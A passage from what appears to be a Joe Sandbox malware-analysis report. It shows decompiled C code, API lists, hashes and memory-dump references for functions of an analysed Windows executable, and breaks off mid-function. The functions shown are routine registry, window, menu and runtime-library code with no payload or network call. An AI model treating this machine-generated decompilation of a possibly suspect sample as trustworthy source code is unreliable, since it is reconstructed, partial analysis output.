				if(RegOpenKeyExW(0x80000001, L"software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExW(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExW(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                  0x0041e37f
                  0x0041e386
                  0x0041e389
                  0x0041e38c
                  0x0041e38f
                  0x0041e39a
                  0x0041e3d1
                  0x0041e3d1
                  0x0041e3dc
                  0x0041e3e1
                  0x0041e3e1
                  0x0041e3e6
                  0x0041e3eb
                  0x0041e3eb
                  0x0041e3f4

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 0041E392
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0041E3B5
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0041E3D1
                  • RegCloseKey.ADVAPI32(?), ref: 0041E3E1
                  • RegCloseKey.ADVAPI32(?), ref: 0041E3EB
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CloseCreate$Open
                  • String ID: software
                  • API String ID: 1740278721-2010147023
                  • Opcode ID: 20dbba8052fc536820311eea5d21477292677a9297adc920527b435b189b9755
                  • Instruction ID: 7aad1a7528374e95dcce5288ededf23a2c7bc870c9a7114f3ab2e4f52e9d1ad7
                  • Opcode Fuzzy Hash: 20dbba8052fc536820311eea5d21477292677a9297adc920527b435b189b9755
                  • Instruction Fuzzy Hash: 6111E676900118BB8B21DF9ADD88CDFBFBDEB89700B5000AAB914A2121D2759E54DB64
                  Uniqueness

                  Uniqueness Score: 0.22%

                  Function 0040C357, Relevance: 10.6, APIs: 7, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(?), ref: 0040C365
                  • GetWindowRect.USER32(?,?), ref: 0040C380
                  • ScreenToClient.USER32(?,?), ref: 0040C393
                  • ScreenToClient.USER32(?,?), ref: 0040C39C
                  • EqualRect.USER32(?,?), ref: 0040C3A6
                  • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0040C3CE
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0040C3D8
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ClientRectScreen$DeferEqualParent
                  • String ID:
                  • API String ID: 443303494-0
                  • Opcode ID: 54e22af4bac11048797fdf47cf58d8ed2c137c2bca7230b1f33007d739ef4bb6
                  • Instruction ID: 9b4bd691bb790c26d1788b8f33ce82ee7038c244376d38ba22e2304d807765cd
                  • Opcode Fuzzy Hash: 54e22af4bac11048797fdf47cf58d8ed2c137c2bca7230b1f33007d739ef4bb6
                  • Instruction Fuzzy Hash: 3A11B272140209EFD710CF64EC88DABBBBDEF88310B10C52ABC56E3254D774A910CB64
                  Uniqueness

                  Uniqueness Score: 0.45%

                  Function 0041F3F7, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041F3F7(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E00428ED5(0, 0);
				_t22 = E0041547B(0, _t31, __edi, __esi, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E00413D98(_t33);
				}
				 *(_t41 + 0xc) = _t23;
				E004281D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E00429303(_t28);
			}












                  0x0041f3f7
                  0x0041f3f7
                  0x0041f3f7
                  0x0041f3fe
                  0x0041f408
                  0x0041f414
                  0x0041f41a
                  0x0041f41f
                  0x0041f427
                  0x0041f42c
                  0x0041f432
                  0x0041f432
                  0x0041f43a
                  0x0041f44b
                  0x0041f457
                  0x0041f45c
                  0x0041f462
                  0x0041f465
                  0x0041f46a
                  0x0041f474
                  0x0041f474
                  0x0041f477
                  0x0041f47d
                  0x0041f488

                  APIs
                  • LeaveCriticalSection.KERNEL32(?), ref: 0041F3FE
                  • __CxxThrowException@8.LIBCMT ref: 0041F408
                    • Part of subcall function 00428ED5: RaiseException.KERNEL32(?,?,?,?), ref: 00428F17
                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B), ref: 0041F41F
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F42C
                    • Part of subcall function 00413D98: __CxxThrowException@8.LIBCMT ref: 00413DAE
                  • _memset.LIBCMT ref: 0041F44B
                  • TlsSetValue.KERNEL32(?,00000000), ref: 0041F45C
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1,?,?,004382C8), ref: 0041F47D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                  • String ID:
                  • API String ID: 356813703-0
                  • Opcode ID: 683a5929f2ede9cb3d3bd7d006d0d21765b822b8cfd3f88763a399873a874837
                  • Instruction ID: 40b3b10cf9ff2656ac24c0a809c9b7a8796c7dbb78a163cbf26b8e8c3fc3356d
                  • Opcode Fuzzy Hash: 683a5929f2ede9cb3d3bd7d006d0d21765b822b8cfd3f88763a399873a874837
                  • Instruction Fuzzy Hash: CE118B70100605AFDB10EF60DC89D6BBBB9EF10358B50C62EF88696661CB35ACA5CB59
                  Uniqueness

                  Uniqueness Score: 2.04%

                  Function 0042F822, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47UNIQUELIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0042F822(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x447e68);
				E00429338(__ebx, __edi, __esi);
				_t31 = E0042C35A(__ebx, __edx, __edi, _t35);
				_t15 =  *0x44ccb4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0042EACE(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x44cbb8; // 0x512728
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x44c790;
								if(__eflags != 0) {
									_push(_t33);
									E00428397(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x44cbb8; // 0x512728
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x44cbb8; // 0x512728
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0042F8BD();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0042AEA5(_t29, _t31, 0x20);
				}
				return E0042937D(_t33);
			}










                  0x0042f822
                  0x0042f822
                  0x0042f822
                  0x0042f822
                  0x0042f824
                  0x0042f829
                  0x0042f833
                  0x0042f835
                  0x0042f83d
                  0x0042f85e
                  0x0042f864
                  0x0042f868
                  0x0042f86b
                  0x0042f86e
                  0x0042f874
                  0x0042f876
                  0x0042f878
                  0x0042f87b
                  0x0042f881
                  0x0042f883
                  0x0042f885
                  0x0042f88b
                  0x0042f88d
                  0x0042f88e
                  0x0042f893
                  0x0042f88b
                  0x0042f883
                  0x0042f894
                  0x0042f899
                  0x0042f89c
                  0x0042f8a2
                  0x0042f8a6
                  0x0042f8a6
                  0x0042f8ac
                  0x0042f8b3
                  0x0042f845
                  0x0042f845
                  0x0042f845
                  0x0042f84a
                  0x0042f84e
                  0x0042f853
                  0x0042f85b

                  APIs
                  • __getptd.LIBCMT ref: 0042F82E
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __amsg_exit.LIBCMT ref: 0042F84E
                  • __lock.LIBCMT ref: 0042F85E
                  • InterlockedDecrement.KERNEL32(?), ref: 0042F87B
                  • InterlockedIncrement.KERNEL32(00512728), ref: 0042F8A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID: ('Q
                  • API String ID: 4271482742-263593293
                  • Opcode ID: 34075ac56374c43f1a66d9d85007a1a8ffba65dbe93c673ac4ccf358b97abe10
                  • Instruction ID: 3e858a921384195d2288191ab6d460c054479cb6a7e3aaef8eace4b66df5302f
                  • Opcode Fuzzy Hash: 34075ac56374c43f1a66d9d85007a1a8ffba65dbe93c673ac4ccf358b97abe10
                  • Instruction Fuzzy Hash: E2018E32B01631ABDB50BB65B84675EB370AF05714FC9407BE814A3781D72C6945CBDE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00421525, Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00421525(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                  0x00421531
                  0x00421537
                  0x0042153e
                  0x00421545
                  0x0042154c
                  0x00421559
                  0x00421560
                  0x00421563
                  0x00421566
                  0x0042156a

                  APIs
                  • GetSysColor.USER32(0000000F), ref: 00421533
                  • GetSysColor.USER32(00000010), ref: 0042153A
                  • GetSysColor.USER32(00000014), ref: 00421541
                  • GetSysColor.USER32(00000012), ref: 00421548
                  • GetSysColor.USER32(00000006), ref: 0042154F
                  • GetSysColorBrush.USER32(0000000F), ref: 0042155C
                  • GetSysColorBrush.USER32(00000006), ref: 00421563
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$Brush
                  • String ID:
                  • API String ID: 2798902688-0
                  • Opcode ID: 69474bcffed8dda3a6354f21933ebca6f7b00e446e8661710cf6f1e24790a001
                  • Instruction ID: 34d056c00bb6a588f6a373530df72d39a2723666dc88f26c28721c2631e374e8
                  • Opcode Fuzzy Hash: 69474bcffed8dda3a6354f21933ebca6f7b00e446e8661710cf6f1e24790a001
                  • Instruction Fuzzy Hash: 42F0FE719407485BD730BBB25D09B47BAD1EFC4710F02192AD2858B990D6B5E441DF44
                  Uniqueness

                  Uniqueness Score: 0.15%

                  Function 00425285, Relevance: 9.3, APIs: 6, Instructions: 325UNIQUE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00424B98: PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00424BDA
                    • Part of subcall function 00424B98: SetRectEmpty.USER32(?), ref: 00424BFE
                    • Part of subcall function 00424B98: GetDesktopWindow.USER32 ref: 00424C16
                    • Part of subcall function 00424B98: LockWindowUpdate.USER32(?), ref: 00424C27
                    • Part of subcall function 0041408A: GetModuleHandleA.KERNEL32(GDI32.DLL,?,004252AE), ref: 00414094
                    • Part of subcall function 0041408A: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004140A0
                  • GetWindowRect.USER32(?,?), ref: 004252D4
                    • Part of subcall function 004140C2: GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 004140D0
                    • Part of subcall function 004140C2: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004140DE
                  • InflateRect.USER32(?,00000002,00000002), ref: 004253C6
                  • InflateRect.USER32(?,00000002,00000002), ref: 0042556C
                    • Part of subcall function 004249F1: OffsetRect.USER32(?,?,?), ref: 00424A2A
                    • Part of subcall function 00425168: GetCapture.USER32 ref: 0042517B
                    • Part of subcall function 00425168: SetCapture.USER32(?), ref: 0042518B
                    • Part of subcall function 00425168: GetCapture.USER32 ref: 00425197
                    • Part of subcall function 00425168: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004251B1
                    • Part of subcall function 00425168: DispatchMessageW.USER32(?), ref: 004251E3
                    • Part of subcall function 00425168: GetCapture.USER32 ref: 00425241
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockOffsetPeekUpdate
                  • String ID:
                  • API String ID: 221289759-0
                  • Opcode ID: 48efcf45122435e95ef7b522c55cab944265335b5d8108171b7e8e58d6bd7be7
                  • Instruction ID: 78804f7dd54d9a8f104266528498f0cd52c217b7c0a0adf1ce6f4a2b447368da
                  • Opcode Fuzzy Hash: 48efcf45122435e95ef7b522c55cab944265335b5d8108171b7e8e58d6bd7be7
                  • Instruction Fuzzy Hash: 04B15932A00619AFCF01DFA4C880EEE7BBAFF49314F054565FD05AF265D672A984CB90
                  Uniqueness

                  Uniqueness Score: 23.02%

                  Function 004169E8, Relevance: 9.1, APIs: 6, Instructions: 149windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E004169E8(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				intOrPtr* _t54;
				struct HMENU__* _t58;
				int _t59;
				int _t60;
				struct HMENU__* _t61;
				int _t63;
				void* _t65;
				signed int _t67;
				int _t68;
				struct HMENU__* _t69;
				struct HMENU__* _t70;
				int _t71;
				intOrPtr* _t75;
				int _t78;
				struct HMENU__* _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				int _t93;
				struct HMENU__* _t94;

				_t79 = __ecx;
				_t92 = __ecx;
				_v8 = __ecx;
				_t53 = E00420B28( *((intOrPtr*)(__ecx + 0x20)));
				if(_a12 == 0) {
					_t54 = __ecx + 0x80;
					_t90 = _a4;
					if( *_t54 == 0) {
						L3:
						_t98 = _t90;
						if(_t90 == 0) {
							E00413DD0(_t79);
						}
						E0041187F( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E00420285(0, _t90, _t92, _t98) + 0x78)) !=  *(_t90 + 4)) {
							__eflags =  *((intOrPtr*)(_t92 + 0xd4)) - 1;
							if( *((intOrPtr*)(_t92 + 0xd4)) != 1) {
								_t58 =  *(_t92 + 0xd8);
							} else {
								_t58 = GetMenu( *(_t92 + 0x20));
							}
							__eflags = _t58;
							if(_t58 == 0) {
								goto L20;
							} else {
								_t69 = E0040F8F7(_t92, _t90);
								__eflags = _t69;
								if(_t69 == 0) {
									goto L20;
								}
								_t86 = _t69;
								_t70 =  *((intOrPtr*)(_t69->i + 0x6c))();
								__eflags = _t70;
								if(_t70 == 0) {
									goto L20;
								}
								_t94 =  *(_t70 + 4);
								__eflags = _t94;
								if(_t94 == 0) {
									L19:
									_t92 = _v8;
									goto L20;
								}
								_t71 = GetMenuItemCount(_t94);
								_t78 = 0;
								_a12 = _t71;
								__eflags = _t71;
								if(_t71 <= 0) {
									goto L19;
								} else {
									goto L15;
								}
								while(1) {
									L15:
									__eflags = GetSubMenu(_t94, _t78) -  *(_t90 + 4);
									if(__eflags == 0) {
										break;
									}
									_t78 = _t78 + 1;
									__eflags = _t78 - _a12;
									if(_t78 < _a12) {
										continue;
									}
									goto L19;
								}
								_v12 = E0041F7CC(_t78, _t86, _t90, _t94, __eflags, _t94);
								goto L19;
							}
						} else {
							_v12 = _t90;
							L20:
							_t59 = GetMenuItemCount( *(_t90 + 4));
							_v40 = _v40 & 0x00000000;
							_v16 = _t59;
							if(_t59 <= 0) {
								L39:
								return _t59;
							} else {
								goto L21;
							}
							do {
								L21:
								_t60 = E0040CC72(_t90, _v40);
								_v44 = _t60;
								if(_t60 == 0) {
									goto L38;
								}
								if(_t60 != 0xffffffff) {
									_v32 = _v32 & 0x00000000;
									__eflags =  *(_t92 + 0x54);
									if( *(_t92 + 0x54) == 0) {
										L30:
										_t61 = 0;
										__eflags = 0;
										L31:
										_push(_t61);
										L32:
										_push(_t92);
										E004118A5( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t93 = _t63;
										if(_t93 >= _v16) {
											L37:
											_v16 = _t93;
											_t92 = _v8;
											goto L38;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t93) {
											_t65 = E0040CC72(_t90, _v40);
											__eflags = _t65 - _v44;
											if(_t65 != _v44) {
												goto L37;
											}
											_t44 =  &_v40;
											 *_t44 = _v40 + 1;
											__eflags =  *_t44;
										}
										goto L37;
									}
									__eflags = _t60 - 0xf000;
									if(_t60 >= 0xf000) {
										goto L30;
									}
									_t61 = 1;
									goto L31;
								}
								_t67 = E0040CC87(_t90, _v40);
								_v32 = _t67;
								if(_t67 == 0) {
									goto L38;
								}
								_t68 = GetMenuItemID( *(_t67 + 4), 0);
								_v44 = _t68;
								if(_t68 != 0 && _t68 != 0xffffffff) {
									_push(0);
									goto L32;
								}
								L38:
								_v40 = _v40 + 1;
								_t59 = _v40;
							} while (_t59 < _v16);
							goto L39;
						}
					}
					_t75 =  *_t54;
					_t79 = _t75;
					_t59 =  *((intOrPtr*)( *_t75 + 0x74))(_t90, _a8, 0);
					if(_t59 != 0) {
						goto L39;
					}
					goto L3;
				}
				return _t53;
			}



































                  0x004169e8
                  0x004169f2
                  0x004169f7
                  0x004169fa
                  0x00416a04
                  0x00416a0a
                  0x00416a11
                  0x00416a16
                  0x00416a2e
                  0x00416a2e
                  0x00416a30
                  0x00416a32
                  0x00416a32
                  0x00416a3a
                  0x00416a3f
                  0x00416a4d
                  0x00416a54
                  0x00416a5b
                  0x00416a68
                  0x00416a5d
                  0x00416a60
                  0x00416a60
                  0x00416a6e
                  0x00416a70
                  0x00000000
                  0x00416a72
                  0x00416a74
                  0x00416a79
                  0x00416a7b
                  0x00000000
                  0x00000000
                  0x00416a7f
                  0x00416a81
                  0x00416a84
                  0x00416a86
                  0x00000000
                  0x00000000
                  0x00416a88
                  0x00416a8b
                  0x00416a8d
                  0x00416abd
                  0x00416abd
                  0x00000000
                  0x00416abd
                  0x00416a90
                  0x00416a96
                  0x00416a98
                  0x00416a9b
                  0x00416a9d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416a9f
                  0x00416a9f
                  0x00416aa7
                  0x00416aaa
                  0x00000000
                  0x00000000
                  0x00416aac
                  0x00416aad
                  0x00416ab0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416ab2
                  0x00416aba
                  0x00000000
                  0x00416aba
                  0x00416a4f
                  0x00416a4f
                  0x00416ac0
                  0x00416ac9
                  0x00416acb
                  0x00416acf
                  0x00416ad4
                  0x00416b82
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416ada
                  0x00416ada
                  0x00416adf
                  0x00416ae4
                  0x00416ae9
                  0x00000000
                  0x00000000
                  0x00416af2
                  0x00416b20
                  0x00416b24
                  0x00416b28
                  0x00416b36
                  0x00416b36
                  0x00416b36
                  0x00416b38
                  0x00416b38
                  0x00416b39
                  0x00416b39
                  0x00416b3d
                  0x00416b45
                  0x00416b47
                  0x00416b4c
                  0x00416b6d
                  0x00416b6d
                  0x00416b70
                  0x00000000
                  0x00416b70
                  0x00416b51
                  0x00416b68
                  0x00416b5b
                  0x00416b60
                  0x00416b63
                  0x00000000
                  0x00000000
                  0x00416b65
                  0x00416b65
                  0x00416b65
                  0x00416b65
                  0x00000000
                  0x00416b68
                  0x00416b2a
                  0x00416b2f
                  0x00000000
                  0x00000000
                  0x00416b33
                  0x00000000
                  0x00416b33
                  0x00416af9
                  0x00416afe
                  0x00416b03
                  0x00000000
                  0x00000000
                  0x00416b0a
                  0x00416b10
                  0x00416b15
                  0x00416b1c
                  0x00000000
                  0x00416b1c
                  0x00416b73
                  0x00416b73
                  0x00416b76
                  0x00416b79
                  0x00000000
                  0x00416ada
                  0x00416a4d
                  0x00416a18
                  0x00416a20
                  0x00416a23
                  0x00416a28
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416a28
                  0x00416b86

                  APIs
                    • Part of subcall function 00420B28: GetFocus.USER32 ref: 00420B2E
                    • Part of subcall function 00420B28: GetParent.USER32(00000000), ref: 00420B56
                    • Part of subcall function 00420B28: GetWindowLongW.USER32(?,000000F0), ref: 00420B71
                    • Part of subcall function 00420B28: GetParent.USER32(?), ref: 00420B7F
                    • Part of subcall function 00420B28: GetDesktopWindow.USER32 ref: 00420B83
                    • Part of subcall function 00420B28: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 00420B97
                  • GetMenu.USER32(?), ref: 00416A60
                  • GetMenuItemCount.USER32(?), ref: 00416A90
                  • GetSubMenu.USER32(?,00000000), ref: 00416AA1
                  • GetMenuItemCount.USER32(?), ref: 00416AC9
                  • GetMenuItemID.USER32(?,00000000), ref: 00416B0A
                  • GetMenuItemCount.USER32(?), ref: 00416B45
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                  • String ID:
                  • API String ID: 4186786570-0
                  • Opcode ID: 93617185f288707b900541143e88cd098a3d75beb5be7de617f81e90bfbe9752
                  • Instruction ID: 74bea372a50bb56c68ea711328b55824e7ee12be864e95f7961d03fddb174585
                  • Opcode Fuzzy Hash: 93617185f288707b900541143e88cd098a3d75beb5be7de617f81e90bfbe9752
                  • Instruction Fuzzy Hash: 01518A31A00215DFCB21AFA4C984AEEB7B5FF45354F22856BE411F2250D738EE84CB69
                  Uniqueness

                  Uniqueness Score: 3.53%

                  Function 00424E62, Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E00424E62(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t81;
				int _t83;
				int _t90;
				intOrPtr _t92;
				intOrPtr _t111;
				int _t125;
				void* _t134;
				void* _t139;
				intOrPtr _t143;
				void* _t145;
				void* _t149;

				_t145 = __edi;
				_t134 = __ecx;
				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
				_t149 = 2;
				if(_t143 == 0xa) {
					L7:
					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
					L9:
					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
					__eflags = _t83;
					L10:
					if(_t83 < 0) {
						_t83 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x140))( &_v12, _t83, _t149, _t145);
					_v44.left = GetSystemMetrics(0x4c);
					_v44.top = GetSystemMetrics(0x4d);
					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
					_t90 = GetSystemMetrics(0x4f);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.bottom = _t90 + _v44.top;
					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
					asm("movsd");
					if(_t92 == 0xa || _t92 == 0xc) {
						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
							__eflags = _t111;
